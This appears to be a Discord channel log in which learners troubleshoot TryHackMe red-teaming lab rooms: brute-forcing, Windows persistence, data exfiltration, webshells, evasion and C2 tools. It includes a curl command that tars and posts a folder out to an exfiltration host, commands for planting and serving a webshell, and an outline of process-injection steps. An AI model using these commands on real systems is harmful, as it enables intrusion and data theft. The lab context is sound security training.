#red-teaming-path

a library is probably missing in your openJDK it's about which version? 11? 12?

I installed openjdk-17-jdk

I am also on Intro to C2 and armitage used openJDK11 for me

try sudo apt install openjdk-11-jdk

Time to go back-in-time

Will give it a try. Ty

Side question. The original Armitage repo has not been touched for 7 years. I am curious if this, or at least this fork, is still a thing.

https://gitlab.com/kalilinux/packages/armitage/-/tree/kali/master/armitage

this one?

you can also do a sudo apt install armitage it works too

Yes. Is it used professionally, commonly?

I tried that but it did not start. Then, I think there was an issue with a headless version and missing a shared library. So each path had its own peril.

yeah for me it was the openjdk-11

I've got an issue with a library missing during the build

after the sudo apt install openjdk-11-jdk it was working well

what version of gradle are you using in gradle-wrapper.properties

I think I have lingering java issues. trying to clear it out

I don't have this file because I have done the install with the apt install

I didn't use the git repo

Trying to paste an image but I can't

That is what I have for java now

jdk search

I am now going to delete the clone, and clone again

bingo

the issue? too many javas lingering and kicking around. A complete purge using dpkg and re-clone, and rebuild, worked. Thanks for the guidance.

Nice!

suggest that the task leave a note about prequisits - namely java version

Now my question about the C2 server in this path: the server and the client are on the same machine? because if I launch from my own kali linux what's the point to use armitage?

I think I am going to have to spend more quality time before I can answer that question. But my guess is that its really a front end for metasploit and others team member could use this through the teamserver.

But its a guess at this stage.

Next step, talking to postgresql

yeah but the teamserver is running on the same machine? for me it should be a teamserver on one machine and we use armitage on our local machine to connect to the server. It's just when I am reading the task it seems to be on the same machine.

Correct. But for the purpose of the lesson they keep it on loopback so you are not exposing something . Or at least that is my theory 🤔

But of course, loopback does not work on purpose. So it has to be on an external facing IP .

Hello, I cant solve this "Once the DNS configuration works fine, resolve the flag.thm.com domain name. What is the IP address? " at Data Exfiltration Task 8

Please somebody help me. I am trying like 2 hours and I cant get answer that I've already done what task said

Is this bugged or something ?

Nevermind I got the answer.

hahahahah Answer is not a solution of your question solve hard problem to build over problem solving skills brother

😄 not like this. I just tried on rooms machine and I got the answer

Hello,

Room: https://tryhackme.com/room/windowslocalpersistence
Task: 4
Section: Creating Backdoor Services

"You can then copy the executable to your target system, say in C:\Windows and point the service's binPath to it."

How do I copy a file from my base machine (linux) to windows?

Tried scp but getting a connection refused

hello evryone

the link for the redteam room doesn't work for task 9, someone can help me please

the room is weaponization

the website for darksource doesn't work

Someone knows a similar site ?

HI everybody, i have help for redteam room password attack task 7, can you help me please ?
[9:40 PM]
when i use hydra, the same error is display
[9:41 PM]
[ERROR] SMTP LOGIN AUTH, either this auth is disabled or server is not using auth: 502 5.5.2 Error: command not recognized
[9:41 PM]
I don't understand for what
[9:41 PM]
for why sorry

https://tryhackme.com/room/passwordattacks
Task 8
Logged into FTP but no flag :C

Same LOL

Could you show a screenshot ?

Task 7 ?

alr sec

Okay, but you do see that there is a directory, right ?

wait

no way this dirs name is "files"

I thought it was just ftp gibberish

bruh

thanks ! @native berry

Gave +1 Rep to @native berry

on room https://tryhackme.com/room/passwordattacks
task 8, on the brute force question, why doesnt this payload work?

the text "Login failed" does appear on the page, and the password is indeed inside the wordlist

Okay, upon further investigation it seems like that the correct credentials also lead to the page with the "Login failed" text, and then redirects to the correct page, extremely odd.

Hello, Im using evil-winrm but it keeps timing out randomly. Like i can connect and get reverse shell, but after a short time it always times out. An error of type Errno::ETIMEDOUT happened, message is Operation timed out - Operation timed out - connect(2) for "10.10.10.161" port 5985 (10.10.10.161:5985)

Error: Exiting with code 1

why do I always get an error when I want to start armitage?

database connection refused

but it is running

Is this on a local box or an attackbox?

Hello, is there any Red Teamer here?

Plenty, just ask your question.

I wanna just have a deep chat about CyberSec

Could I message you privately to have a deep chat?

or here if you like

If you post here, then more than myself can answer.

alright

first of all, we know that Red Teamer is a person acts as a hacker

to help the blue team to do their job

but we understand that there's no one perfect so no one could hack everything on their own

so of course there are people specialist in many different fields

according to PCs ( Computers, Laptops ) and mobiles, what are the fields inside them?

because I wanna know what I wanna be specialist in

I hope I am so clear

a person has mentioned that there's a field called hardware

from what i get from your question is, you are looking to work in a team where each member plays a certain role. and you want to know what those possible roles are so that you can begin specialising in one of them and then find a team who needs that specialisation

precisely, I wanna know what I am going for

Red Teaming is a wide thing

it's not about hacking a particular thing

and no one could hack everything

I wanna know what the filed for PCs ( Computers, Laptops ) and mobiles

for example

web hacking

has

Web API

bug bounty API

understood, 🙂 I'm not at a point where i could offer an answer to you, but i'm definitely interested in following any input from red teamers on here also

it's like a field inside it

the same goes for PCs and mobiles

hardware

apps

...etc

I wanna know ( ... etc )

because everyone uses the word ( etc ) to refer that there are more things

alright, I wanna know the more things

to find what I exactly wanna do

I tried to google it but found nothing

Hey, Muhammad! Great to meet you! Pentesting / offsec has a TON of specialties. Do you mind telling me more about what you want to hack on pc's and phones? For instance, there's hardware, application, protocol, internal/external network testing, etc.

that's an answer I got from someone in the industry yesterday and I asked about the other examples that he didn't type and used the word "etc" instead because as far as I remember, he told me that he doesn't recall the others now but there are more.

etc could refer to SCADA pentesting and IOT pentesting

Thanks mate

Gave +1 Rep to @paper gale

On room https://tryhackme.com/room/windowslocalpersistence
Task 6
I followed all of the instructions, I logged out and back in and received a shell successfully, however I am not able to get the flag

whoops found the issue

If you are reusing payloads, chances are that you are getting a connection back from one of the previous backdoors you planted on the machine. If you restart the machine, it will work for sure

I actually put it in the startup folder of a specific user instead of the global one

Glad it works now! 👍

can any one give a hint how to find flag16

i tried everything to get the shell.aspx on windows but is not working

If you are getting some sort of access denied error, you need to grant permission to the IIS user to read and execute the file. The easier way to do so is by running icacls <path_to_shell.aspx> /grant Everyone:F

What is white cards?

WindowsLocalPersistence-Task2-RID Hijacking. I have edited the SAM entry for user 3F2, and made the RID change to 500. When I RDP with xfreerdp or remmina, the desktop just continues to flash and never settles down. Anyone see this and have a solution? (Note if I go back to the Administrator account, the issues also presents itself)

Hello guys, I am doing from the Data Exfiltration room the Task 6, and in HTTP Data Exfiltration task I have this problem:
When I type this: "curl --data "file=$(tar zcf - task6 | base64)" http://web.thm.com/contact.php" in thm@victim1, this error appears: "curl: (7) Failed to connect to web.thm.com port 80: Connection refused". Can you please help me?
Thanks a lot.

Can somebody tell me whether ACLs / DACLs/SACLs are specified by the DC per host basis or are they host based?

Or both lol I dunno

Weaponizationr oom

keeps disconnecting me

xfrerdp

was working fine for a bit

damn i guess this room gets 0 attentio

It do gets attention.
Did you try remmina already?

I just stuck with the browser machine

Was a bit annoying but got through

Can anyone help with windows local persistence?

You best off with asking your question straight away, that way you will more likely get a reply 🙂

Reset solved everything.

It's more of a bug i guess.. I cannot get the flag for Task 5 Abusing Scheduled Tasks.
Getting the reverse shell is no problem, but even NT Authority/System can't get to flag9

It's not just about getting a shell as System, these exe binaries are checking if certain conditions are met to give you the flag

So make sure you name your scheduled task exactly as mentioned in the task

Do you solved it?

Hello there, while passing the online password attack room I have encountered the following issue.There is a task where you have to crack a SMTP server.But while I was cracking it with hydra I got the following error:
[ERROR] SMTP LOGIN AUTH, either this auth is disabled or server is not using auth: 503 5.5.1 Error: authentication not enabled
Any ideas why do I get the following error and what can I do to solve this or this is an issue with the room?

Im also having the same errlor

ugh i dont wanna have to use the attackbox for these tiny things

Best to provide the full command you used

Or even better a screenshot thereof

You'll have to verify in order to send screenshots

!docs verify

this is on the attackbox

It would be also helpful to see the output above, so if you could not cut the screenshot so much, that would be appreciated 😄

Don't specify the port in the IP, hydra is doing that on it's own

I get the same result

cewl -m 8 -w clinic.lst https://clinic.thmredteam.com/

is what i use for generatingf the initial wordlist

then with john i generate the wordlist with the rule that there is a symbol infront of the word and two numbers 0-9 after

What about you specify the IP and service like that 10.10.114.128 smtp ?

same result again sadly

Did you restart the target machine already?

Am having a problem related to some question on this path: The question was ; which nmap option to use in order to specify the 162 as source port while scanning for hosts discovery. I anwsered the question by submitting " -g 162" but he anwser was wrong I search on google but in vain. Is there someone who can help me that? Thanks in advance

No not yet

ill restart it now and try again

exact same error message after restarting

man

Mh, have to go to the dentist now, will look into it later, in case you didn't figured out already

yh im still struggling

thanks for the help tho

I tried this task again for you and yes i got the errors even after 2 restarts but after my 3rd one it goes like it should - even a nmap-scan shows open ports on 25. So restart it and try it again 😉

I used the Name, but will triple-check again now. Thanks for the answer

Gave +1 Rep to @native berry

just do the complete explanation of task 5 and you will get the result

Ah

😉

Check nmap docs bruh

Hello.... Friends... I'm new to here..

Can anyone give the pathway of redteam

i have the same problem you had some time ago
"SAM hashes extraction failed: 'NoneType' object is not subscriptable"
reinstalling impacket did not solve it, did you find a different solution?

troubleshoot, did you check github as it was stated above mine? there are alot of different issues that could cause it as I have no idea what OS you are running as I am now running a Arch install with the tools I need when I need them, I don't recall what I checked.

This is basically the chall in one picture:
up right: two commands with 'schtasks' (maybe someone spots a mistake here) then
bottom right: the psexec to make it disappear. That is has disappeared you can see in the up right, the last 'schtasks' command.
up left: you can see, i get the connection with netcat and can't get the flag.

I think i found something: I deleted all security descriptors instead of just thm-taskbackdoor 😄 I hope that fixes it.

oh yes that could fix it 😉

how is it?

did not fix it

"Sorry! You are still missing something. No flag for you yet. (11)"

but it changed form (12) to (11)

oh, sorry it worked now! I misspelled the task this time, but now all works. But hell, this room is evil 😄

Anyone know how to fix this?

Stackoverflow?

im trying to search it up

struggling to find

searching it up was the first thing i did

i can see similar issues

Windows Persistence lab btw

im also having constant issues with evilwinrm

rarely connects

!vpnscript

try this just to check it is not your connection being iffy

This helps a lot

everything seems fine

this time i connected instantly

the script mustve done something

ty

or fconfrimation biasd ¯_(ツ)_/¯

yh connection still iffy

i hate evilwinrm

https://tenor.com/view/the-batman-face-nut-angry-gif-25106740

receivetimeout error

After quite some time of trying to download the files through winrm

still doesnt work after restarting

definitely an issue with my impacket

Ill try attackbox

Do you updated your impacket version?

yes i reinstalled it

ok, then let us know, if you get the result with attckbox 😉

i will ty

with attackbox im getting this error

I guess impacket isnt fully installed on this

tried a different script

still cant get it

could you give me the task-name? I will redo it on my own

I said it here

windows persistence lab

i know that, but the persistence i find is in ad - is that right?

i found it

Windows Local Persistence

yh

do you have a stable evil-connection on attackbox now?

with user thmuser1

yes with the attackbox its very smooth

no issues there

check whoami /groups with this account and check Backup Operators

its all right

fine I go deeper and test more

`Impacket v0.10.1.dev1+20220606.123812.ac35841f - Copyright 2022 SecureAuth Corporation

[-] ("Unpacked data doesn't match constant value 'b''' should be ''regf''", 'When unpacking field 'Magic | "regf | b''[:4]'')
[*] Cleaning up... `

try python3 instead of python3.9 or python3.10

alright

same error

i guess there are some issuse with your 2 bak-files

i worked for me like a charm

I will try it with the newest version of secretsdump.py from github

also fine

Fuck

ill try again

It finally worked after restarting the target for the fifth time

ty

bad luck ^^ but well done 😉

This was all for practice

In the Sandbox evasion room, I'm having trouble compiling the given dropper for task 3. Anybody have any suggestions?

What does /e:VBScript do when running wscript?

how do we connect to BreachingAd login bruteforce page

i can't access the page both in attackbox and kali

i have configured the breachingAD.ovpn file

what's wrong??

Heyo! From what I understand, I believe it tells wscript to execute the file as a VBSScript/.vbs file even if it's not (a .txt for example)

I just started the red teaming path and remember seeing this last night when it was mentioning how you don't necessarily need to rename the file extension to vbs to run it

Thank you for this response, it clears a lot up

Heyy guys... I was wondering why I can't have my gobuster scan find the "wp-login" page on Mr. Robot machine even if the wordlist is the same as in the walkthrough ... Is there anyone who can help me?

can someon please vote for Lateral Movement and Pivoting reset?

You should state which subnet you're in.

There is multiple instances.

10.200.19.X

I had the exact same problem as you and I agree, this is quite a jump for someone to make. The verbiage in the "room" states "...during the enumeration, we found that the webserver serves logout.php" but there is no explanation as to how "logout.php" was found. I ran DirB with the "-X php" parameter against http://10.10.x.x/login-get using several different wordlists but "logout.php" still was not discovered.

Maybe the lesson is simply stating that at some point during our imaginary Red Team engagement we noticed "logout.php" while enumerating something and made note of it. IDK

can anyone help with this https://www.tryhackme.com/room/signatureevasion#, task2 round to the nearest kibibyte.

The phrasing is a bit unlike, just round to the 1000 😉
1kibibyte = 1024 byte

Thank you Hackshell, still confused, the number that I am trying to round is 50500 how does it get to 1024 bytes?

just think up or down to 1000 --> 51000 or 50000

Got it, Thank you very much! Hackshell

I need help on the Windows Local Persistence Task 2 - download the SYSTEM and SAM hive. When i use my own Kali box, the evil-winrm does not seem to work when using the "download system.bak" and "download sam.bak". The evil-winrm version is 3.4. When I used the attack box (which is running evil-winrm v2.4) it seem to work perfect fine. Anyone can help on this discrepancy?

try download the bak files again. I had this issue with these files too. If it isn't working anyway let me know.
Or just try the attack with your machine with the already known hash.

I have actually tried multiple times. Since like it does not work. Though it works perfectly fine on the attack box..

i dunno whats going on with my nslookup and dig??

Looks like it may be an issue with OpenSSL. Is it your personal Kali instance or a THM Kali instance?

Same issue is reported in the following Reddit post (for Fedora, but someone reports having the issue with Kali), a solution listed in there.

https://www.reddit.com/r/Fedora/comments/vyv8qc/nsupdate_bindutils_crash/

I recall having a similar issue previously on Kali and it was resolved with a reboot luckily

its a personal VM. Yeah i tried a reboot, but no go. It was after and update/upgrade. thanks for the link my man!

Ah yeah that'll likely be it then. Talks about OpenSSL 3 Legacy providers, so something likely got upgraded that's borked bind-utils

i fear i fudge something else up. is there a way i can just get a copy of the default /etc/ssl/openssl.cnf and start from square one?

i can still ping and whois

super strange

of course there's a default in the same spot

just removed the jammed up one , cp'd the default, and made the changes suggested and works like a charm. thanks

I was there

*Evil-WinRM* PS C:\flags> flag1.exe
The term 'flag1.exe' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:1
+ flag1.exe
+ ~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (flag1.exe:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException

*Evil-WinRM* PS C:\flags> 

Oh wait

Did you checked your permission with -- whoami /groups --?
After adding the key 1 in the registry you have to relog with evil-winrm. Then you should have all necessary permissions and then only then you create your two bak-files.

Let me give it another try. ...

Evil-WinRM download
With Evil-WinRM, if you are trying to download a file. Don't forget to add full paths for both remote and local machines. It might help A LOT.

Do this...

C:\Users\UserName> download C:\Temp\MyFile.txt /home/kali/Downloads/MyFile.txt

Instead of ...

C:\Users\UserName> download MyFile.txt MyFile.txt

Because it might show ''Download successful'' but you won't actually download anything

Enjoy

Try: .\flag1.exe

Good idea. Thx! Much appreciated.
I'll try that later today.

Hey hey, I'm currently working on Task 8 in Windows Local Persistence and it's saying to download an ASP.NET webshell but the machine has no internet access. Tried using wget on a webshell made in msfvenom on the AttackBox but the machine can't reach out anywhere, anyone run into this issue?

Hi, https://tryhackme.com/room/livingofftheland - task4 - does anyone know what should be downloaded to make the flag appear on the windows desktop (I've tried multiple different files: txt, exe, ps1, and also with multiple vm starts/terminiations, but nothing works)?

I have tried it and works. Thanks for the pointer.

Gave +1 Rep to @zinc coyote

Hey, you can download it on your machine and copy the code via the clipboard on the in-browser machine

In the section of Breaching Active Directory Task 8 LDAP the link of the printer page http://printer.za.tryhackme.com/settings.aspx not working

I tried downloading the file to my PC and copying it over but the clipboard functionality doesn't work for me, is there any other solution?

(Just for context I mean I can't get the webshell[.]aspx file into the 'wpersistence' machine, the AttackBox clipboard works fine)

I'd say the easiest way is to connect to WPERSISTENCE via RDP and copy it directly. It should work with RDP clients like Remmina or xfreerdp

You can do so with the credentials provided on task 2

If none of that works, you can use smbserver.py -smb2support -username Administrator -password Password321 public . to mount a shared folder from your kali or attackbox which you can then access from the file explorer on the WPERSISTENCE machine by pointing to \\YOUR_KALI_IP\public\

be sure to run the command from a folder that only contains your webshell so you don't accidentaly share any important files 🙂

Ahhh got it! Thank you for your help!

Gave +1 Rep to @echo ore

I really enjoyed#red-teaming-path

r

Yeah, that could be the case. I was just trying to get through the red team path tbh. While the path got me some good experience with tools and such, I finally got a job as a pentester and I have a completely new toolset 😄
Now I'm working through PortSwigger Web Security Academy and learning how to use Burp Suite better. I wish I would have learned about this resource earlier, PortSwigger is hands down the best free online course for learning web vulnerabilities. When I was searching for pentest gigs I noticed the market is looking for webapp testers mostly. If you're looking to break into pentesting I would recommend spending your time on portswigger and learning burp, as it's likely the path of least resistance.
There probably are red team openings or network pentest openings, but most of them are looking for pentest experience.
I know this isn't really related to the red team path, sorry guys 🙂 but anyone doing this path hoping to break into pentesting will hopefully find some value in this comment.

Hi all, I am having trouble with Data Exfiltration Task 10 establishing the tunnel. I think the issue is with my DNS A and NS records. I have followed instructions exactly and am using the THM AttackBox. I fail when I try to establish the ssh session to 10.1.1.2 as per the instructions, the connection times out. Can anyone assist with the correct domain and values for the A and NS records I should be using to confirm I have these configured correctly please? Also, do I need to update the netplan.yaml settings for task 10 as per the instructions in task 8? Many thanks in advance.

What's the difference between?
--mtu
and
--data-length
In nmap? As far as I can tell you can achieve the same result with these. IP Header will always be 20 bytes and the rest of the data has to be a multiple of 8

--data-length <number> (Append random data to sent packets)
Normally Nmap sends minimalist packets containing only a header. So its TCP packets are generally 40 bytes and ICMP echo requests are just 28. Some UDP ports and IP protocols get a custom payload by default. This option tells Nmap to append the given number of random bytes to most of the packets it sends, and not to use any protocol-specific payloads. (Use --data-length 0 for no random or protocol-specific payloads. OS detection (-O) packets are not affected because accuracy there requires probe consistency, but most pinging and portscan packets support this. It slows things down a little, but can make a scan slightly less conspicuous.
https://nmap.org/book/man-bypass-firewalls-ids.html

(. . .)You can set the length of data carried within the IP packet using --data-length VALUE. Again, remember that the length should be a multiple of 8.
End of task4 https://tryhackme.com/room/redteamfirewalls

While nmap docs specified that --mtu requires you to use a value that's a multiple of 8 ,with which the task writer agrees, in case of --data-length the docs and the task author seem to disagree (?)

@empty sleet is there a reason it’s a multiple of 8?

I know other people have had problems with task 2 in the signature evasion room with transferring the shell.exe file to the linux machine, and so far the answers i've seen for that problem have not really solved the problem, so to save you guys the headache, youre better off just watching a walkthrough on youtube. I dont know who made this room, but geez. That's 2 hours of my life I will never get back.

--data-length will add random data at the end of the packet instead of just sending the bare headers of the packet. The idea here is to trick any network security device into thinking the packet is part of some ongoing communication and has a content, which might be less suspicious than header-only packets.

--mtu is about packet fragmentation. Nmap will cut your packet into smaller ones and sent fragmented packets over the network. The idea here is that if your network security device (IPS, FW, etc) can't handle fragmentation well, packets might pass through it without being properly checked and received and reassembled by the end host.

hopefully that helps 🙂

Clears a bit up but I m still in the dark with this.
Edit: Read the message below lul

(Append random data to sent packets)
Normally Nmap sends minimalist packets containing only a header. So its TCP packets are generally 40 bytes and ICMP echo requests are just 28.
That's from the docs.
So I guess your message clears that part of my question, thanks !

However
Does --data-length require the supplied value to be a multiple of 8?

Nmap docs don't specify it but the author of the task claims that is has to be 8.
Maybe I m missing something obvious here and say, a (IP Header)20+12 byte packet won't be processed correctly at all

Gave +1 Rep to @echo ore

Just tested this quickly and --data-len takes values that aren't multiple of 8. For example nmap 10.13.0.1 -p 22 --data-length 123 works and generates a packet with a tcp payload (for TCP scan) of 123 bytes

Thanks haha !
I know I could've done this myself but with stuff like this I prefer that people with more experience test it.

Gave +1 Rep to @echo ore

Also, sb has got to update the task 😉

I'll make sure to forward this so that it gets checked 🙂

Hey, could someone help me with a task in windows internals?

I can't find the stack argument in the task threads.

@brisk path

BRUUUUUUUUUUUUUUUH

Either something's fucking wrong again with my solution OR it's on you guys

eh, just gonna move the .sln and other shit to my kali vm for future use

aight seems like pinging THM staff members is allowed

@echo ore ; -;
Need a pastebin with the code / the whole project?

aight zipping the repo and exfiling it
Thank god for 7zip

Also how's that thing :D?

Hey, haven't done the room myself, so I'm not really sure, however the error is telling you the sleepCheck variable is being used without initialization. This may get solved if you assign a value to it where you defined it.

This will be checked soon for sure 🙂

Dude

I didn't assign it

It's "your" .exe

provided in your vm to get the flag

Aight :D

and I've implemented the sleep function as shown in the task :)
(And for future reference. yes I added the required lib in the linker options, without it the thing doesn't compile anyway LOL)

@brisk path any ideas?

I can share the .cpp I compiled. Gonna w8 for your response + I don't wanna send a potential answer here

If this is also mistake Imma have a good time ngl 😂

There is an error in your implementation of the sleep function. I would suggest re-reading the instructions and your solution.

Aight but you could explain why does your .exe crash like this

And as you can see every check up to this one here is passed

and yes I have included windows.h and iostream

and like I've said, solution compiles fine no errors no nothing

unless freaking 65000ms is too much for the check although it crashes even before the 1minute mark is complete

Omfg. Alright it seems like this version of my code didn't have the quadruple slashes

for fucks sake. Sorry my bad my bad!!

Aight but can you point me to somewhere so I can understand why this occurs?

it sounds really bizarre

aw man still no dice

https://pastebin.com/siMHZuLW
Dunno, I m so done with this. Why am I receiving warning from xstring is beyond me
Edit: And yes I used the "using namespace std;" may I burn in hell etc. etc.

Nice pfp

lul
insert identification joke here

Abusing windows internals is really challenging for me to wrap my head around
Do you guys recommend some c++ tutorials to make that module more clear?

Basic knowledge of programming in C++ / programming in general is enough. What might be more difficult for you is the WinAPI itself. Personally I just read some stuff about the most commonly used ones in binary exploitation etc. made a cheatsheet and some templates.
Guided Hacking on YT might be of help.

yeah, it's a lot of information

Remembering Windows-specific data types will come with practice. The channel I've mentioned above has a really good video about how memory works in general and in context relevant to windows and API.

1. Get the Proc handle
2. Getting a handle of a thread / module
3. Overwriting VirtualProtectEx, saving the old one
4. Allocating memory for your payload
5. Making space for the payload in the target process (Widely depends on the techniq)
6. Writing your payload to that freed space
7. Triggering the payload

Is the rough overview of how process injection works. If sbs got a better one please share it !

This might be slightly in the blackhat area but writing cheats for games largely depends on WinAPI. Might be of use to you, might not.

do you think you can abuse win api with golang or any other compiled language or c++ is the best option?

You could probably even get away with some wack shit like Python to C++ but honestly, C++ is the best option
Edit: By Python to C++ I meant Cython

https://github.com/rootm0s/Injectors/tree/master/injectAllTheThings
This is a pretty neat repo

for education

saved it

Finished my first room today!

Question I noticed a few rooms have limited access in some cases a few days can I finish the red-teaming-path?

You will need to rejoin the room after it, but that's all. Your progress on the rooms won't be affected and you can finish the room from where you left it.

Hey,
For this room https://tryhackme.com/room/obfuscationprinciples task8
What env can I use to compile c++ files?

anyone have an issue in the red-teaming-path /lateral movement pivoting/ pass the hash with the mimikatz.exe suddenly disappearing after using it?

hi

hello some here

hello some one here

Anyone know of any issues with the VM in Weaponization room with the Red Teaming Path?

Can’t ping it and the RDP is crapping out

Hello hello, I’m doing the task 7 on local persistence and I can’t trigger the sticky keys shortcut , I have tried everything but no results

Am I doing it the wrong way or it’s a bug?

Can anyone help with RedTeaming Path, Windows Local Persistence, Task ?

Task 2

hmm shadow could try

Anyone know how to edit a inf file in evil-winrm PS?

Here is a screenshot. I think there is a step missing:

If anyone could suggest how to modify this inf file inside PS within evil-winrm, it would be appreciated....

Cricket....cricket!!!

Anyone in here???

well you do not need to edit it from evil winrm

after all they give you access to an admin account that lets you edit said files

The instruction to teach this is conspicuously absent

the first 20 or so lines of the task 2 tells you the info to login as admin on the box

My evil-winrm login is admin

then the instructions start for this under: Special Privileges and Security Descriptors

yes but you are supposed to use rdp with the normal admin account and not the evil-winrm

as this is for flag 2 and not flag 1

There is no mention of this...in the room, so far...perhaps that should be added.

headdesk

it is in the task text you must just have missed it

got it...with the GUI....thanks

Hi guys, i have question for the room https://tryhackme.com/room/passwordattacks, task 8:question no.2. i want to generate the dictionary using rules that i already set. from the pictures seem it successfully processed, but where did the files created? thx

Nowhere, because you are piping the output to wc instead of redirecting it to a file

Hello I have a question about the room abusing windows internals task 4 I have solved by trying. But why is it working with explorer.exe and the previous tasks with dllhost.exe

Hi @native berry thanks for replying. anyway in john, what operator should i use to pipe it to a file?

Gave +1 Rep to @native berry

There is a difference in using a redirect operator or a pipe, if you google that difference that should lead you to your answer 🙂

haha i am laughing to my self. sudo john --wordlist=clinic.lst --stdout --rules=THM > dicnew.txt solve my problem

Anyone else having issues with Windows Local Persistence in the Red Teaming Path, Task 4?

I can create the service but cannot start it…getting error 1053. Even tried starting from GUI…no joy!

Can you send some screenshots? I might be able to help 🙂

Thank you..I will grab a screengrab, next time I am in there. and post it here

@echo ore Here it is:

I can create the service but I cannot start it.

This is an issue with the VM. Can an administrator look into this please?

I created this service with the administrator account.

If I remember correctly this might be working actually. Did you check if the Administrator's password changed afterwards?

The reason you get that error is because you are executing a binary that is not supposed to be used as a service (net). What will happen is that the Service Control Manager will run the command and expect it to report something as any service would (service executables have a couple of special functions inside to talk to the SCM but your commands doesn't), and kill the process afterwards as it doesn't get a timely response. The command does gets executed, however.

Hello red team, so I have a question I posted this on Reddit and got different answers so let’s see what yours are. Is it possible to hack into a computer and overheat it to the point the batter catches on fire?

Throwing this out there in case someone gets stuck and searches for this. I knew how to fix it based on when I did the OSCP but I think it might be confusing for others.

Here's the question:
When you visit the http://flag.thm.com/flag website through the uploader machine via the HTTP tunneling technique, what is the flag?

To do this on your own Kali VM rather than the attack box, do this:

1. Open /etc/proxychains4.conf with a text editor of your choice.

2. Edit the socks5 settings at the bottom to match this (screenshot 1)
   socks5 127.0.0.1 1080

3. Prepend your curl command with proxychains:
   proxychains curl 127.0.0.1:1080 http://flag.thm.com/flag

I hope that helps if someone gets stuck and searches for the question on Discord. Happy hacking 🙂

To my knowledge no, it is not possible

If you were to overclock the CPU it would not catch fire

Or the batter

hey guys quick question in the Red Team Threat Intel Mod task 7 I'm a little confused in what its wanting me todo. Is it wanting me to just compare the APT 41 model to the test site they have me launch in that task or am I supposed to come up with my own?

has anyone tried solving the Exploiting AD network using only powerview without Bloodhound since it's a very noisy tool and not to be used on a red team

Hey everyone,
I am stuck at Online Passwords Attack task when trying to bruteforce SMTP with Hydra.
I input this command as it is asked :
hydra -l pittman@clinic.thmredteam.com -P password.lst smtp://10.10.48.88:25

and i get this when starting to bruteforce :
[ERROR] SMTP LOGIN AUTH, either this auth is disabled or server is not using auth: 502 5.5.2 Error: command not recognized

Any ideas ?

Hey there. 🙂
I just checked it myself, there might be an issue, so just try smtps meanwhile.
In case there is indeed an issue, I will forward it.

Hey all --
I am doing this room in the red team path:
https://tryhackme.com/room/avevasionshellcode

Here's the question:
What is the Magic number value of the thm-intro2PE.exe file (in Hex)?

Here's the value from PE-bear:

But 4D5A is not the right answer?

Even ChatGPT tells me that is the answer! 😄

magic numbers might be longer than 2 bytes. try checking online for a list of well-known magic numbers and compare against the one you got.

But the answer syntax shows 4 hex numbers which would be 2 bytes?

"little-endian" and "big-endian" but don't ask me more about that 😄

Ah! I got you. Thank you!

Gave +1 Rep to @native berry

In the signature evasion room @ https://tryhackme.com/room/signatureevasion task 2
I split the file into 2 and moved them into the machine, but it dont seem to trigger Windows Defender

Anyone?

How did you fix it?

are the red teaming path tickets still a thing or have they been discontinued?

The latter.

Hi!
Who was able to get the flag in the end?
[Evading Logging and Monitoring]
Task 10 Real world scenario
There must be 3 conditions met:

1-Disable logging where needed
2-Maintain environment integrity
3-Clean our tracks

What is missing, because it seems like all the conditions have been met.
But when the agent is started, the logs continue to be kept.
Any suggestions, hints, ideas?)

Hi, I am stuck in Signature Evastion room (task 2). If anyone could provide some steps on how to solve question 2 on task 2 then that would be very helpful. Basically, the question is, "
To the nearest kibibyte, what is the first detected byte?"

Done!

I am also looking for some help exactly in this scenario, for a long time.

Python question I’m now in the breaching Active Directory room. The passwordsprayer. Py is giving errors, the syntax is right. When I’m using Python script in my own kali boxes it gives frequently errors. Is there a method to fix this?

I'm getting this weird error while Brute-forcing Pittman@clinic.thmreadteam.com in Module Password attacks

[ERROR] SMTP LOGIN AUTH, either this auth is disabled or server is not using auth: 502 5.5.2 Error: command not recognized

Use smtps, this should be changed in the room soon.

Kk

Hey guys,

can you help resetting this network https://tryhackme.com/room/exploitingad
I can't connect to it

i was able to connect until it stopped

For exploitingad task 5
The only way to get kdbx password is with keylogger?
https://tryhackme.com/room/exploitingad

Evening, I am on the data exfil room and task 6. I'm having issues getting the neo-regeorg to work. I get failled to connect to 127.0.0.1 when I send the command it specifies in the lessons.

I have got it to successfully setup the tunnel, however, I am now getting an empty response from the curl and it tells me ERROR, that there is a fail message and it is shutting down. I read in the forum someone else had a problem and stripping the port number off of the machine they were trying to get to fixed it but that hasn't fixed mine sadly.

Hey everyone 🙂 Can anyone give some hints for this room ?

[Evading Logging and Monitoring]
Task 10 Real world scenario

Beeing stuck too, any suggestions ?

I just think agent.exe is broken: when with no log from powershell in the eventvwr, agent.exe stil saying binary leaked 🤦‍♂️

when you use the -l flag, you must only specify the username. There is no need to specify the hostname or IP address.

Ok I'll try that

Hello

I am constantly having an issue to start a service which has successfully been created

Any idea what is causing this?

Windows local persistence

Services

Anyone know why I cannot do a ZONE transfer on task 9, layoftheland?

PS C:\Users\kkidd> ipconfig

Windows IP Configuration

Ethernet adapter Ethernet 3:

Connection-specific DNS Suffix . : eu-west-1.compute.internal
Link-local IPv6 Address . . . . . : fe80::54f4:a9ed:a215:b119%9
IPv4 Address. . . . . . . . . . . : 10.10.90.28
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : 10.10.0.1
PS C:\Users\kkidd> nslookup
Default Server: ip-10-0-0-2.eu-west-1.compute.internal
Address: 10.0.0.2

server 10.10.90.28
Default Server: ip-10-10-90-28.eu-west-1.compute.internal
Address: 10.10.90.28

ls -d thmreadteam.com
[ip-10-10-90-28.eu-west-1.compute.internal]
*** Can't list domain thmreadteam.com: Non-existent domain
The DNS server refused to transfer the zone thmreadteam.com to your computer. If this
is incorrect, check the zone transfer security settings for thmreadteam.com on the DNS
server at IP address 10.10.90.28.

nslookup
Server: ip-10-10-90-28.eu-west-1.compute.internal
Address: 10.10.90.28

Windows IP Configuration


Ethernet adapter Ethernet 3:

   Connection-specific DNS Suffix  . : eu-west-1.compute.internal
   Link-local IPv6 Address . . . . . : fe80::54f4:a9ed:a215:b119%9
   IPv4 Address. . . . . . . . . . . : 10.10.90.28
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : 10.10.0.1
PS C:\Users\kkidd> nslookup
